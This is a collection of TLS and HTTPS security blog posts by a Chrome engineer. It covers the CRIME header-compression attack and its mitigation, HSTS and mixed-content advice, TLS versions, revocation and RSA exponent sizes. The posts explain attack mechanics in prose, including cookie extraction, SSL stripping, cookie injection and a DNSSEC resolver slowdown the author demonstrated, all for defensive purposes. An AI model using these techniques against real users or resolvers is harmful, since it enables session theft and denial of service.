Last year I happened to worry on the SPDY mailing list about whether sensitive information could be obtained via SPDY's use of zlib for compressing headers. Sadly, I never got the time to follow up and find out whether it was a viable attack. Thankfully there exist security researchers who, independently, wondered the same thing and did the work for me! Today Duong and Rizzo presented that work at ekoparty 2012.

They were also kind enough to let Firefox and ourselves know ahead of time so that we could develop and push security fixes before the public presentation. In order to explain what we did, let's start by looking at how SPDY compressed headers:

(This is inline SVG, if you can't see it, check here.)

? ? ? ? ? ? ? ? : h o s t ? ? ? ? w w w . g o o g l e . c o m ? ? ? ? : m e t h o d ? ? ? ? G E T ? ? ? ? : p a t h ? ? ? ? / ? ? ? ? : s c h e m e ? ? ? ? h t t p s ? ? ? ? : v e r s i o n ? ? ? ? H T T P / 1 . 1 ? ? ? ? a c c e p t ? ? ? ? t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * ; q = 0 . 8 ? ? ? ? a c c e p t - c h a r s e t ? ? ? ? I S O - 8 8 5 9 - 1 , u t f - 8 ; q = 0 . 7 , * ; q = 0 . 3 ? ? ? ? a c c e p t - e n c o d i n g ? ? ? ? g z i p , d e f l a t e , s d c h ? ? ? ? a c c e p t - l a n g u a g e ? ? ? ? e n - U S , e n ; q = 0 . 8 ? ? ? ? c o o k i e ? ? ? ? P R E F = I D = 7 0 c b b f e 7 e e 8 8 a 5 e 2 : F F = 0 : T M = 1 3 4 7 4 0 0 4 7 9 : L M = 1 7 8 7 4 1 4 3 9 5 : S = f J q m r k s _ 8 G h 3 i 1 K D ; N I D = 6 3 = k 9 f K d q _ 2 g u F 0 O 1 F 5 g V 6 K 3 C I t F b x d d 2 f D W L g x T H f a Q 3 5 P q 4 S D d d d A i H F 9 G G 9 6 2 3 A J v - W U b U p A h 8 _ 0 Y Z T 6 B H Q N 4 f A B 2 j O 3 _ Y 5 q H 7 w x e d A N v I n J 5 R r h l s i i h M Y q e - s u 1 U 1 O ? ? ? ? u s e r - a g e n t ? ? ? g M o z i l l a / 5 . 0 ( X 1 1 ; L i n u x x 8 6 _ 6 4 ) A p p l e W e b K i t / 5 3 7 . 1 0 ( K H T M L , l i k e G e c k o ) C h r o m e / 2 3 . 0 . 1 2 6 4 . 0 S a f a r i / 5 3 7 . 1 0 ? ? ? ? x - c h r o m e - v a r i a t i o n s ? ? ? 0 C M + 1 y Q E I l b b J A Q i d t s k B C K S 2 y Q E I p 7 b J A Q i 9 t s k B C L u D y g E = ? ? ? ? ? ? ? ? : h o s t ? ? ? ? w w w . g o o g l e . c o m ? ? ? ? : m e t h o d ? ? ? ? G E T ? ? ? ? : p a t h ? ? ? ? / c s i ? v = 3 ? s = w e b h p ? a c t i o n = ? s r t = 2 4 6 ? p = s ? n p n = 1 ? e = 1 7 2 5 9 , 2 3 6 2 8 , 2 3 6 7 0 , 3 2 6 9 0 , 3 5 7 0 4 , 3 7 1 0 2 , 3 8 0 3 4 , 3 8 4 4 9 , 3 8 4 6 6 , 3 9 1 5 4 , 3 9 3 3 2 , 3 9 5 2 3 , 3 9 9 7 8 , 4 0 1 9 5 , 4 0 3 3 3 , 3 3 0 0 0 4 7 , 3 3 0 0 1 1 7 , 3 3 0 0 1 2 5 , 3 3 0 0 1 3 2 , 3 3 0 0 1 3 5 , 3 3 0 0 1 5 7 , 3 3 1 0 0 1 1 , 4 0 0 0 1 1 6 , 4 0 0 0 2 6 0 , 4 0 0 0 2 6 7 , 4 0 0 0 2 7 8 , 4 0 0 0 3 0 8 , 4 0 0 0 3 5 2 , 4 0 0 0 3 5 4 , 4 0 0 0 4 7 2 , 4 0 0 0 4 7 6 , 4 0 0 0 5 1 6 , 4 0 0 0 5 1 9 , 4 0 0 0 5 5 3 , 4 0 0 0 5 9 3 , 4 0 0 0 6 0 5 , 4 0 0 0 6 1 6 , 4 0 0 0 7 6 2 , 4 0 0 0 8 2 5 , 4 0 0 0 8 3 7 , 4 0 0 0 8 4 1 , 4 0 0 0 8 4 9 ? e i = Y r N P U N P t H 8 T C g A f Y 7 I C A C g ? i m c = 2 ? i m n = 2 ? i m p = 2 ? r t =

That's a pretty busy diagram! But I don't think it's too bad with a bit of explanation:

zlib uses a language with basically two statements: “output these literal bytes” and “go back x bytes and duplicate y bytes from there”. In the diagram, red text was included literally and black text came from duplicating previous text.

The duplicated text is underlined. A dark blue underline means that the original text is in the diagram and there will be a gray line pointing to where it came from. (You can hover the mouse over one of those lines to make it darker.)

A light blue underline means that the original text came from a pre-shared dictionary of strings. SPDY defines some common text, for zlib to be able to refer to, that contains strings that we expect to find in the headers. This is most useful at the beginning of compression when there wouldn't otherwise be any text to refer back to.

The problem that CRIME highlights is that sensitive cookie data and an attacker controlled path is compressed together in the same context. Cookie data makes up most of the red, uncompressed bytes in the diagram. If the path contains some cookie data, then the compressed headers will be shorter because zlib will be able to refer back to the path, rather than have to output all the literal bytes of the cookie. If you arrange things so that you can probe the contents of the cookie incrementally, then (assuming that the cookie is base64), you can extract the cookie byte-by-byte by inducing the browser to make requests.

For details of how to get zlib to reveal that information in practice, I'll just refer you to Duong and Rizzo's CRIME presentation. It's good work.

In order to carry out this attack, the attacker needs to be able to observe your network traffic and to be able to cause many arbitrary requests to be sent. An active network attacker can do both by injecting Javascript into any HTTP page load that you make in the same session.

When we learned of this work, we were already in the process of designing the compression for SPDY/4, which avoids this problem. But we still needed to do something about SPDY/2 and SPDY/3 which are currently deployed. To that end, Chrome 21 and Firefox 15 have switched off SPDY header compression because that's a minimal change that easily backports.

Chrome has also switched off TLS compression, through which a very similar attack can be mounted.

But we like SPDY header compression because it saves significant amounts of data on the wire! Since SPDY/4 isn't ready to go yet we have a more complex solution for Chrome 22/23 that compresses data separately while still being backwards compatible.

Most importantly cookie data will only ever be duplicated exactly, and in its entirety, against other cookie data. Each cookie will also be placed in its own Huffman group (Huffman coding is a zlib detail that I skipped over in the explanation above). Finally, in case other headers contain sensitive data (i.e. when set by an XMLHttpRequest), non-standard headers will be compressed in their own Huffman group without any back references.

That's only a brief overview of the rules. The code to follow them and continue to produce a valid zlib stream wasn't one of the cleaner patches ever landed in Chrome and I'll be happy to revert it when SPDY/4 is ready. But it's effective at getting much of the benefit of compression back.

To the right are a couple of images of the same sort of diagram as above, but zoomed out. At this level of zoom, all you can really see are the blocks of red (literal) and blue (duplicated) bytes. The diagram on the right has the new rules enabled and, as you can see, there is certainly more red in there. However that's mostly the result of limited window size. In order to save on server memory, Chrome only uses 2048-byte compression windows and, under the new rules, a previous cookie value has to fit completely within the window in order to be matched. So things are a little less efficient until SPDY/4, although we might choose to trade a little more memory to make up for that.

SSL interstitial bypass rates

In yesterday's post I threw in the following that I've been asked to clarify:

“we know that those bypass buttons are clicked 60% of the time by Chrome users”

Chrome collects anonymous statistics from users who opt in to such collection (and thank you to those who do!). One of those statistics covers how frequently people bypass SSL interstitials. (As always, the Chrome privacy policy has the details.)

We define bypassing the interstitial as clicking the ‘Proceed anyway’ button and not bypassing as either closing the tab, navigating elsewhere, or clicking the ‘Back’ button.

I picked five days at random over the past six weeks and averaged the percentages of the time that users bypassed rather than not. That came to 61.6%.

There may be some biases here: we may have a biased population because we only include users who have opted in to statistics collection. We are also counting all interstitals: there may be a small number of users who bypass a lot of SSL errors. But that's the data that we have.

Living with HTTPS

(These are my notes from the first half of my talk at HOPE9 last weekend. I write notes like these not as a script, but so that I have at least some words ready in my head when I'm speaking. They are more conversational and less organised than a usual blog post, so please forgive me the rough edges.)

HTTPS tends to cause people to give talks mocking certificate security and the ecosystem around it. Perhaps that's well deserved, but that's not what this talk is about. If you want to have fun at the expense of CAs, dig up one of Moxie's talks. This talk deals with the fact that your HTTPS site, and the sites that you use, probably don't even reach the level where you get to start worrying about certificates.

I'm a transport security person so the model for this talk is that we have two computers talking over a malicious network. We assume that the computers themselves are honest and uncompromised. That might be a stretch in these malware-ridden times, but that's the area of host security and I'm not talking about that today. The network can drop, alter or fabricate packets at will. As a lemma, we also assume that the network can cause the browser to load any URL it wishes. The network can do this by inserting HTML into any HTTP request and we assume that every user makes some unencrypted requests while browsing.

Stripping

If the average user typed mail.google.com into a browser and saw the following, what fraction of them do you think would login, none the wiser?

Can you even see what's terribly wrong here?

The problem is that the page isn't served over HTTPS. It should have been, but when a user types a hostname into a browser, the default scheme is HTTP. The server may attempt to redirect users to HTTPS, but that redirect is insecure: a MITM attacker can rewrite it and keep the user on HTTP, spoofing the real site the whole time. The attacker can now intercept all the traffic to this perfectly well configured and secure website.

This is called SSL stripping and it's terribly simple and devastatingly effective. We probably don't see it very often because it's not something that corporate proxies need to do, so it's not in off-the-shelf devices. But that respite is unlikely to last very long and maybe it's already over: how would we even know if it was being used?

In order to stop SSL stripping, we need to make HTTPS the only protocol. We can't do that for the whole Internet, but we can do it site-by-site with HTTP Strict Transport Security (HSTS).

HSTS tells browsers to always make requests over HTTPS to HSTS sites. Sites become HSTS either by being built into the browser, or by advertising a header:

Strict-Transport-Security: max-age=8640000; includeSubDomains

The header is in force for the given number of seconds and may also apply to all subdomains. The header must be received over a clean HTTPS connection.

Once the browser knows that a site is HTTPS only, the user typing mail.google.com is safe: the initial request uses HTTPS and there's no hole for an attacker to exploit.

(mail.google.com and a number of other sites are already built into Chrome as HSTS sites so it's not actually possible to access accounts.google.com over HTTP with Chrome - I had to doctor that image! If you want to be included in Chrome's built-in HSTS list, email me.)

HSTS can also protect you, the webmaster, from making silly mistakes. Let's assume that you've told your mother that she should always type https:// before going to her banking site or maybe you setup a bookmark for her. That's honestly more than we can, or should, expect of our users. But let's say that our supererogatory user enters https://www.citibank.com in order to securely connect to her bank. What happens? Well, https://www.citibank.com redirects her to http://www.citibank.com. They've downgraded the user! From there, the HTTP site should redirect back to HTTPS, but the damage has been done. An attacker can get in through the hole.

I'm honestly not picking on Citibank here. They were simply the second site that I tried and I was some surprised that the first site didn't have the problem. It's a very easy mistake to make, and everything just works! It's a completely silent disaster! But HSTS would have either prevented it, or would have failed closed.

HSTS also does something else. It turns this:

Into this:

The “bypass this certificate error” button has gone. That button is a UI disaster. Asking regular people to evaluate the validity of X.509 certificates is insane. It's a security cop-out that we're saddled with, and which is causing real damage.

We've seen widespread MITM attacks using invalid certificates in Syria and, in recent weeks, Jordan. These attacks are invalid! This is squarely within our threat model for transport security and it shouldn't have been a risk for anybody. But we know that those bypass buttons are clicked 60% of the time by Chrome users. People are certainly habituated to clicking them and I bet that a large number of people were victims of attacks that we should have been able to prevent.

If you take only one thing away from this talk, HSTS should be it.

Mixed scripting

One we're sorted HSTS we have another problem. These snippets of HTML are gaping wide holes in your security:

<script src="http://...

<link href="http://...

<embed src="http://...

It's called mixed scripting and it happens when a secure site loads critical sub-resources over HTTP. It's a subset of mixed content: mixed content covers loading any sub-resource insecurely. Mixed content is bad, but when the resource is Javascript, CSS, or a plugin we give is another name to make it clear that its a lot more damaging.

When you load sub-resources over HTTP, an attacker can replace them with content of their choosing. The attacker also gets to choose any page on your HTTPS site with the problem. That includes pages that you don't expect to be served over HTTPS, but happen to be mapped. If you have this problem anywhere, on any HTTPS page, the attacker wins.

With complex sites, it's very difficult to ensure that this doesn't happen. One good way to limit it is to only serve over HTTPS so that there aren't any pages that you expect to serve over HTTP. Also, HSTS might also save you if you're loading mixed script from the same domain.

Another mitigation is to use scheme-relative URLs everywhere possible. These URLs look like //example.com/bar.js and are valid in all browsers. They inherit the scheme of the parent page, which will be HTTP or HTTPS as needed. (Although it does mean that if you load the page from disk then things will break. The scheme will be file:// in that case.)

Fundamentally this is such an easy mistake to make, and such a problem, that the only long term solution is for browsers to stop loading insecure Javascript, CSS and plugins for HTTPS sites. To their credit, IE9 does this and did it before Chrome. But I'm glad to say that Chrome has caught up and mixed scripting is now blocked by default, although with a user-override:

Yes, there's another of those damm bypass buttons. But we swear that it's just a transitional strategy and it already stops silent exploitation in a hidden iframe.

Cookies

HTTP and HTTPS cookie jars are the same. No really: cookies aren't scoped to a protocol! That means that if you set a Cookie on https://example.com and then make a request to http://example.com, the cookies will be sent in the clear! In order to prevent this, you should be setting secure on your HTTPS cookies. Sadly this is a very easy thing to miss because everything will still work if you omit it, but without the secure tag, attackers can easily steal your cookies.

It's worth noting that HSTS can protect you from this: by preventing the HTTP request from being sent, the cookies can't be leaked that way, but you'll need to include all subdomains in the HSTS coverage.

There's a second corollary to this: attackers can set your HTTPS cookies to. By causing an request to be sent to http://example.com, they can spoof a reply with cookies that then override any existing cookies. In this fashion, an attacker can log a user in as themselves during their interaction with an HTTPS site. Then, say, emails that they send will be saved in the attacker's out-box.

There's no very good protection against this except HSTS again. By preventing any HTTP requests you can stop the attacker from spoofing a reply to set the cookies. Against, HSTS needs to cover all subdomains in order to be effective against this.

Get yourself checked out

You should go to https://www.ssllabs.com and run their scan against your site. It's very good, but ignore it if it complains about the BEAST attack. It'll do so if you make a CBC ciphersuite your top preference. Browsers have worked around BEAST and non-browser clients are very unlikely to provide the attacker enough access to be able to pull it off. You have a limited amount of resources to address HTTPS issues and I don't think BEAST should make the list.

Get a real certificate

You should get a real certificate. You probably already have one but, if you don't, then you're just training more people to ignore certificate errors and you can't have HSTS without a real certificate. StartSSL give them away for free. Get one.

If you've reached this far and have done all of the above, congratulations: you're in the top 0.1% of HTTPS sites. If you're getting bored, this is a reasonable point to stop reading: everything else is just bonus points from now on.

Forward secrecy

You should consider forward secrecy. Forward secrecy means that the keys for a connection aren't stored on disk. You might have limited the amount of information that you log in order to protect the privacy of your users, but if you don't have forward secrecy then your private key is capable of decrypting all past connections. Someone else might be doing the logging for you.

In order to enable forward secrecy you need to have DHE or ECDHE ciphersuites as your top preference. DHE ciphersuites are somewhat expensive if you're terminating lots of SSL connections and you should be aware that your server will probably only allow 1024-bit DHE. I think 1024-bit DHE-RSA is preferable to 2048-bit RSA, but opinions vary. If you're using ECDHE, use P-256.

You also need to be aware of Session Tickets in order to implement forward secrecy correctly. There are two ways to resume a TLS connection: either the server chooses a random number and both sides store the session information, of the server can encrypt the session information with a secret, local key and send that to the client. The former is called Session IDs and the latter is called Session Tickets.

But Session Tickets are transmitted over the wire and so the server's Session Ticket encryption key is capable of decrypting past connections. Most servers will generate a random Session Ticket key at startup unless otherwise configured, but you should check.

I'm not going to take the time to detail how to configure this here. There are lots of webservers and it would take a while. This is more of a pointer so that you can go away and research it if you wish.

(The rest of the talk touched on OpenSSL speed, public key pinning, TLS 1.1 and 1.2 and a few other matters, but I did those bits mostly on the fly and don't have notes for them.)

Decrypting SSL packet dumps

We all love transport security but it can get in the way of a good tcpdump. Unencrypted protocols like HTTP, DNS etc can be picked apart for debugging but anything running over SSL can be impenetrable. Of course, that's an advantage too: the end-to-end principle is dead for any common, unencrypted protocol. But we want to have our cake and eat it.

Wireshark (a common tool for dissecting packet dumps) has long had the ability to decrypt some SSL connections given the private key of the server, but the private key isn't always something that you can get hold of, or want to spread around. MITM proxies (like Fiddler) can sit in the middle of a connection and produce plaintext, but they also alter the connection: SPDY, client-certificates etc won't work through them (at least not without special support).

So here's another option: if you get a dev channel release of Chrome and a trunk build of Wireshark you can run Chrome with the environment variable SSLKEYLOGFILE set to, say, /home/foo/keylog. Then, in Wireshark's preferences for SSL, you can tell it about that key log file. As Chrome makes SSL connections, it'll dump an identifier and the connection key to that file and Wireshark can read those and decrypt SSL connections.

The format of the key log file is described here. There's an older format just for RSA ciphersuites that I added when Wireshark decrypted purely based on RSA pre-master secrets. However, that doesn't work with ECDHE ciphersuites (amongst others) so the newer format can be used to decrypt any connection. (You need the trunk build of Wireshark to support the newer format.) Chrome currently writes records of both formats.

This can also be coupled with spdy-shark to dissect SPDY connections.

Since key log support is part of NSS, support will hopefully end up in Firefox in the future.

New TLS versions

TLS is the protocol behind most secure connections on the Internet and most TLS is TLS 1.0, despite that fact that the RFC for 1.0 was published in January 1999, over 13 years ago.

Since then there have a two newer versions of TLS: 1.1 (2006) and 1.2 (2008). TLS 1.1 added an explicit IV for CBC mode ciphers as a response to CBC weaknesses that eventually turned into the BEAST attack. TLS 1.2 changes the previous MD5/SHA1 combination hash to use SHA256 and introduces AEAD ciphers like AES-GCM.

However, neither of these versions saw any significant adoption for a long time because TLS's extension mechanism allowed 1.0 to adapt to new needs.

But things are starting to change:

  • Google servers now support up to TLS 1.2.
  • iOS 5 clients support up to TLS 1.2.
  • Chrome dev channel supports up to TLS 1.1.
  • Twitter, Facebook and Cloudflare appear to be deploying TLS 1.2 support, although the nature of large deployments means that this may vary during a gradual deployment.
  • Opera supports up to TLS 1.2, although I believe that 1.1 and 1.2 are disabled by default.

In the long run, getting to 1.2 is worthwhile. The MD5/SHA1 hash combination used previous versions was hoped to be more secure than either hash function alone, but [1] suggests that it's probably only as secure as SHA1. Also, the GCM cipher modes allow AES to be used without the problems (and space overhead) of CBC mode. GCM is hardware accelerated in recent Intel and AMD chips along with AES itself.

But there are always realities to contend with I'm afraid:

Firstly, there's the usual problem of buggy servers. TLS has a version negotiation mechanism, but some servers will fail if a client indicates that it supports the newer TLS versions. (Last year, Yngve Pettersen suggested that 2% of HTTPS servers failed if the client indicated TLS 1.1 and 3% for TLS 1.2.)

Because of this Chrome implements a fallback from TLS 1.1 to TLS 1.0 if the server sends a TLS error. (And we have a fallback from TLS 1.0 to SSL 3.0 if we get another TLS error on the second try.) This, sadly, means that supporting TLS 1.1 cannot bring any security benefits because an attacker can cause us to fallback. Thankfully, the major security benefit of TLS 1.1, the explicit CBC IVs, was retrofitted to previous versions in the form of 1/n-1 record splitting after the BEAST demonstration.

Since these fallbacks can be a security concern (especially the fallback to SSLv3, which eliminates ECDHE forward secrecy) I fear that it's necessary to add a second, redundant version negotiation mechanism to the protocol. It's an idea which has been floated before and I raised it again recently.

But buggy servers are something that we've known about for many years. Deploying new TLS versions has introduced a new problem: buggy networks.

Appallingly it appears that there are several types of network device that manage to break when confronted with new TLS versions. There are some that break any attempt to offer TLS 1.1 or 1.2, and some that break any connections that negotiate these versions. These failures, so far, manifest in the form of TCP resets, which isn't currently a trigger for Chrome to fallback. Although we may be forced to add it.

Chrome dev or iOS users suffering from the first type of device see all of their HTTPS connections fail. Users suffering the second type only see failures when connecting to sites that support TLS 1.1 or 1.2. (Which includes Google.). iOS leaves it up to the application to implement fallback if they wish and adding TLS 1.2 support to Google's servers has caused some problems because of these bad networks.

We're working to track down the vendors with issues at the moment and to make sure that updates are available, and that they inform their customers of this. I'm very interested in any cases where Chrome 21 suddenly caused all or some HTTPS connections to fail with ERR_CONNECTION_RESET. If you hit this, please let me know (agl at chromium dot org).

([1] Antoine Joux, Multicollisions in Iterated Hash Functions: Application to Cascaded Constructions, CRYPTO (Matthew K. Franklin, ed.), Lecture Notes in Computer Science, vol. 3152, Springer, 2004, pp. 306–316.)

False Start's Failure

Eighteen months ago(ish), Chrome started using False Start. False Start reduces the average time for an SSL handshake by 30%.

Since the biggest problem with transport security is that most sites don't use it, anything that reduces the latency impact of HTTPS is important. Making things faster doesn't just make them faster, it also makes them cheaper and more prevalent. When HTTPS is faster, it'll be used in more places than it would otherwise be.

But, sadly, False Start will be disabled, except for sites doing NPN, in Chrome 20. NPN is a TLS extension that we use to negotiate SPDY, although you don't have to use it to negotiate SPDY, you can advertise http/1.1 if you wish.

False Start was known to cause problems with a very small number of servers and the initial announcement outlined the uncommon scheme that we used to deploy it: we scanned the public Internet and built up a list of problematic sites. That list was built into Chrome and we didn't use False Start for connections to those sites. Over time the list was randomly eroded away and I'd try to address any issues that came up. (Preemptively so in the case of large sites.)

It did work to some extent. Many sites that had problems were fixed and it's a deployment scheme that is worth considering in the future. But it didn't ultimately work well enough for False Start.

Initially we believed that False Start issues were deterministic so long as the TLS Finished and application data records were sent in the same TCP packet. We changed Chrome to do this in the hopes of making False Start issues deterministic. However, we later discovered some HTTPS servers that were still non-deterministically False Start intolerant. I hypothesise that the servers run two threads per connection: one for reading and one for writing. Although the TCP packet was received atomically, thread scheduling could mean that the read thread may or may not be scheduled before the write thread had updated the connection state in response to the Finished.

This non-determinism made False Start intolerance difficult to diagnose and reduced our confidence in the blacklist.

The `servers' with problems were nearly always SSL terminators. These hardware devices terminate SSL connections and proxy unencrypted data to backend HTTP servers. I believe that False Start intolerance is very simple to fix in the code and one vendor suggested that was the case. None the less, of the vendors who did issue an update, most failed to communicate that fact to their customers. (A pattern that has repeated with the BEAST fix.)

One, fairly major, SSL terminator vendor refused to update to fix their False Start intolerance despite problems that their customers were having. I don't believe that this was done in bad faith, but rather a case of something much more mundane along the lines of “the SSL guy left and nobody touches that code any more”. However, it did mean that there was no good answer for their customers who were experiencing problems.

Lastly, it was becoming increasingly clear that we had a bigger problem internationally. Foreign admins have problems finding information on the subject (which is mostly in English) and foreign users have problems reporting bugs because we can't read them. We do have excellent agents in countries who liaise locally but it was still a big issue, and we don't cover every country with them. I also suspect that the distribution of problematic SSL terminators is substantially larger in some countries and that the experience with the US and Europe caused us to underestimate the problem.

In aggregate this lead us to decide that False Start was causing more problems than it was worth. We will now limit it to sites that support the NPN extension. This unfortunately means that it'll be an arcane, unused optimisation for the most part: at least until SPDY takes over the world.

Very large RSA public exponents

After yesterday's post that advocated using RSA public exponents of 3 or 216+1 in DNSSEC for performance, Dan Kaminsky asked me whether there was a potential DoS vector by using really big public exponents.

Recall that the RSA signature verification core is me mod n. By making e and n larger, we can make the operation slower. But there are limits, at least in OpenSSL:

/* for large moduli, enforce exponent limit */
if (BN_num_bits(rsa->n) > OPENSSL_RSA_SMALL_MODULUS_BITS) {
        if (BN_num_bits(rsa->e) > OPENSSL_RSA_MAX_PUBEXP_BITS) {
                RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT, RSA_R_BAD_E_VALUE);
                return -1;
        }
}

So, if n is large, we enforce a limit on e. The values of the #defines are such that for n>3072 bits, e must be less than or equal to 64 bits. So the slowest operations happen with an n and e of 3072 bits. (The fact that e<n is enforced earlier in the code.)

So I setup *.bige.imperialviolet.org. This is a perfectly valid and well signed zone which happens to use a 3072-bit key with a 3072-bit public exponent. (I could probably have slowed things down more by picking a public exponent with lots of 1s in its binary representation, but it's just a random number in this case.) One can resolve records 1.bige.imperialviolet.org, 2.bige.imperialviolet.org, … and the server doesn't have to sign anything because it's a wildcard: a single signature covers all of the names. However, the resolver validates the signature every time.

On my 2.66GHz, Core 2 laptop, 15 requests per second causes unbound to take 95% of a core. A couple hundred queries per second would probably put most DNSSEC resolvers in serious trouble.

So I'd recommend limiting the public exponent size in DNSSEC to 216+1, except that people are already mistakenly using 232+1, so I guess that needs to be the limit. The DNSSEC spec limits the modulus size to 4096-bits, and 4096-bit signatures are about 13 times slower to verify than the typical 1024-bit signatures used in DNSSEC. But that's a lot less of a DoS vector than bige.imperialviolet.org, which is 2230 times slower than normal.

RSA public exponent size

RSA public operations are much faster than private operations. Thirty-two times faster for a 2048-bit key on my machine. But the two operations are basically the same: take the message, raise it to the power of the public or private exponent and reduce modulo the key's modulus.

What makes the public operations so much faster is that the public exponent is typically tiny, while the private exponent should be the same size as the modulus. One can actually use a public exponent of three in RSA, and clearly cubing a number should be faster than raising it to the power of a 2048-bit number.

In 2006, Daniel Bleichenbacher (a fellow Googler) gave a talk at the CRYPTO 2006 rump session where he outlined a bug in several, very common RSA signature verification implementations at the time. The bug wasn't nearly as bad as it could have been because it only affected public keys that used a public exponent of three and most keys used a larger exponent: 216+1. But the fact that a slightly larger public exponent saved these buggy verifiers cemented 216+1 as sensible default value for the public exponent.

But there's absolutely no reason to think that a public exponent larger than 216+1 does any good. I even checked that with Bleichenbacher before writing this. Three should be fine, 216+1 saved some buggy software a couple of times and any larger is probably a mistake.

Because of that, when writing the Go RSA package, I didn't bother supporting public exponents larger than 231-1. But then several people reported that they couldn't verify some DNSSEC signatures. Sure enough, the DNSKEY records for .cz and .us are using a public exponent of 232+1.

DNSSEC is absolutely the last place to use large, public exponents. Busy DNS resolvers have to resolve tens or hundreds of thousands of records a second; fast RSA signature verification is big deal in DNSSEC. So I measured the speed impact of various public exponent sizes with OpenSSL (1.0.1-beta3):

Public exponentVerification time (µs)
310.6
216+123.9
232+142.7
2127-1160.7

So a public exponent of 232+1 makes signature verification over four times slower than an exponent of three. As DNSSEC grows, and DNSSEC resolvers too, that extra CPU time is going to be a big deal.

It looks like the zones using a value of 232+1 are just passing the -e flag to BIND's dnssec-keygen utility. There's some suggestion that -e used to select 216+1 but silently changed semantics in some release.

So today's lesson is don't pass -e to dnssec-keygen! The default of dnssec-keygen is 216+1 and that's certainly safe. The .com zone uses a value of three and I think that's probably the best choice given the CPU cost and the fact that the original Bleichenbacher bug has been long since fixed.

Forward secrecy for IE and Safari too

When we announced forward secrecy for Google HTTPS we noted that “we hope to support IE in the future”. It wasn't that we didn't want to support IE, but IE doesn't implement the combination of ECDHE with RC4. IE (or rather, SChannel) does implement ECDHE with AES on Vista and Windows 7, but I only wanted to make one change at a time.

With the release of MS12-006 a month ago to address the BEAST weakness in TLS 1.0's CBC design, we've now made ECDHE-RSA-AES128-SHA our second preference cipher. That means that Chrome and Firefox will still use ECDHE-RSA-RC4-SHA, but IE on Vista and Windows 7 will get ECDHE now. This change also means that we support ECDHE with Safari (at least on Lion, where I tried it.)

RSA 2012

Just a brief note that I'll be at RSA 2012 in San Francisco at the end of the month and will be speaking with several others about certificate revocation. (tech-106, Tuesday, 1pm.).

If you want to chat and don't manage to grab me then, drop me an email. (agl at imperialviolet.org if you didn't already know.)

Revocation checking and Chrome's CRL

When a browser connects to an HTTPS site it receives signed certificates which allow it to verify that it's really connecting to the domain that it should be connecting to. In those certificates are pointers to services, run by the Certificate Authorities (CAs) that issued the certificate, that allow the browser to get up-to-date information.

All the major desktop browsers will contact those services to inquire whether the certificate has been revoked. There are two protocols/formats involved: OCSP and CRL, although the differences aren't relevant here. I mention them only so that readers can recognise the terms in other discussions.

The problem with these checks, that we call online revocation checks, is that the browser can't be sure that it can reach the CA's servers. There are lots of cases where it's not possible: captive portals are one. A captive portal frequently requires you to sign in on an HTTPS site, but blocks traffic to all other sites, including the CA's OCSP servers.

If browsers were to insist on talking to the CA before accepting a certificate, all these cases would stop working. There's also the concern that the CA may experience downtime and it's bad engineering practice to build in single points of failure.

Therefore online revocation checks which result in a network error are effectively ignored (this is called “soft-fail”). I've previously documented the resulting behaviour of several browsers.

But an attacker who can intercept HTTPS connections can also make online revocation checks appear to fail and so bypass the revocation checks! In cases where the attacker can only intercept a subset of a victim's traffic (i.e. the SSL traffic but not the revocation checks), the attacker is likely to be a backbone provider capable of DNS or BGP poisoning to block the revocation checks too.

If the attacker is close to the server then online revocation checks can be effective, but an attacker close to the server can get certificates issued from many CAs and deploy different certificates as needed. In short, even revocation checks don't stop this from being a real mess.

So soft-fail revocation checks are like a seat-belt that snaps when you crash. Even though it works 99% of the time, it's worthless because it only works when you don't need it.

While the benefits of online revocation checking are hard to find, the costs are clear: online revocation checks are slow and compromise privacy. The median time for a successful OCSP check is ~300ms and the mean is nearly a second. This delays page loading and discourages sites from using HTTPS. They are also a privacy concern because the CA learns the IP address of users and which sites they're visiting.

On this basis, we're currently planning on disabling online revocation checks in a future version of Chrome. (There is a class of higher-security certificate, called an EV certificate, where we haven't made a decision about what to do yet.)

Pushing a revocation list

Our current method of revoking certificates in response to major incidents is to push a software update. Microsoft, Opera and Firefox also push software updates for serious incidents rather than rely on online revocation checks. But our software updates require that users restart their browser before they take effect, so we would like a lighter weight method of revoking certificates.

So Chrome will start to reuse its existing update mechanism to maintain a list of revoked certificates, as first proposed to the CA/Browser Forum by Chris Bailey and Kirk Hall of AffirmTrust last April. This list can take effect without having to restart the browser.

An attacker can still block updates, but they have to be able to maintain the block constantly, from the time of revocation, to prevent the update. This is much harder than blocking an online revocation check, where the attacker only has to block the checks during the attack.

Since we're pushing a list of revoked certificates anyway, we would like to invite CAs to contribute their revoked certificates (CRLs) to the list. We have to be mindful of size, but the vast majority of revocations happen for purely administrative reasons and can be excluded. So, if we can get the details of the more important revocations, we can improve user security. Our criteria for including revocations are:

  1. The CRL must be crawlable: we must be able to fetch it over HTTP and robots.txt must not exclude GoogleBot.
  2. The CRL must be valid by RFC 5280 and none of the serial numbers may be negative.
  3. CRLs that cover EV certificates are taken in preference, while still considering point (4).
  4. CRLs that include revocation reasons can be filtered to take less space and are preferred.

For the curious, there is a tool for fetching and parsing Chrome's list of revoked certificates at https://github.com/agl/crlset-tools.

Extracting Mozilla's Root Certificates

When people need a list of root certificates, they often turn to Mozilla's. However, Mozilla doesn't produce a nice list of PEM encoded certificates. Rather, they keep them in a form which is convenient for NSS to build from: https://mxr.mozilla.org/mozilla/source/security/nss/lib/ckfw/builtins/certdata.txt?raw=1.

Several people have written quick scripts to try and convert this into PEM format, but they often miss something critical: some certificates are explicitly distrusted. These include the DigiNotar certificates and the misissued COMODO certificates. If you don't parse the trust records from the NSS data file, then you end up trusting these too! There's at least one, major example of this that I know of.

(Even with a correct root file, unless you do hard fail revocation checking you're still vulnerable to the misissued COMODO certificates.)

So, at the prodding of Denton Gentry, I've open-sourced a tool for converting NSS's file to PEM format: extract-nss-root-certs. (At the time of writing it requires a 6g built from the weekly or current tree (hg -r weekly), not the release tree. A few of the APIs have changed since the last Go release was done. This will be resolved when Go 1.0 is released.)

BEAST followup

(See the original post for background.)

Everyone seems to have settled on 1/n-1 record splitting as a workaround for the BEAST attack in TLS 1.0 and SSLv3. Briefly: 1/n-1 record splitting breaks CBC encrypted records in two: the first with only a single byte of application data and the second with the rest. This effectively randomises the IV and stops the attack.

The workaround which OpenSSL tried many years ago, and which hit significant issues, was 0/n record splitting. It's the same thing, but with the first record being empty. The problem with it was that many stacks processed the empty record and returned a 0-byte read, which higher levels took to mean EOF.

